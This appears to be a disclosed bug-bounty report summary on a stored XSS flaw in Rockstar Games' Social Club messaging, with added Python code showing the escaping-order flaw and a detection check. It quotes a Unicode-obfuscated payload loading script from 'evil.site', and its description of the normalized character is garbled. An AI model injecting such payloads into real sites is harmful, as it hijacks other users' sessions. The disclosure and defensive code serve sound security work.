The return of the <
High
Rockstar Games
Submitted None
Team Summary
Official summary from Rockstar Games
In this report, the researcher was able to demonstrate a Stored XSS vulnerability in our Message system on the Social Club website. By taking advantage of the fact that '<' characters are normalized to '<', as well as discovering improper escaping of the aforementioned '<' character, the researcher was able to craft a payload to perform XSS attacks. An example payload: =[̕h+͓.<script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕
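The ordering problem the summary describes, as an added example that is not Rockstar Games' code: output escaping that runs before a normalization step misses look-alike characters that only become `<` afterwards. The summary does not say which normalization the site applied, so Unicode NFKC and the fullwidth characters U+FF1C/U+FF1E are assumptions here, as are all function names.

```python
import html
import unicodedata

# Constructed sample message. U+FF1C and U+FF1E are fullwidth look-alikes of
# '<' and '>' (assumed input; the page does not name the character involved).
SAMPLE = "hello \uff1cb\uff1e world"

# Characters that change meaning in an HTML context.
HTML_SIGNIFICANT = set("<>&\"'")


def render_escape_then_normalize(message: str) -> str:
    """Flawed order: the escaper sees no ASCII '<', then normalization creates one."""
    escaped = html.escape(message, quote=True)
    return unicodedata.normalize("NFKC", escaped)


def render_normalize_then_escape(message: str) -> str:
    """Hardened order: canonicalize first, escape as the very last step."""
    normalized = unicodedata.normalize("NFKC", message)
    return html.escape(normalized, quote=True)


def introduces_markup(raw: str, form: str = "NFKC") -> bool:
    """Detection check: True if normalization yields HTML-significant
    characters that were not present in the raw input."""
    before = HTML_SIGNIFICANT & set(raw)
    after = HTML_SIGNIFICANT & set(unicodedata.normalize(form, raw))
    return bool(after - before)


if __name__ == "__main__":
    print("escape -> normalize:", render_escape_then_normalize(SAMPLE))
    print("normalize -> escape:", render_normalize_then_escape(SAMPLE))
    print("flag for review:    ", introduces_markup(SAMPLE))
```

The `introduces_markup` check can run over stored messages to find content that would turn into markup under the assumed normalization.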
Reported by: alexbirsan
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Bounty: $1000.00
Submitted:
Weakness: Cross-site Scripting (XSS) - Stored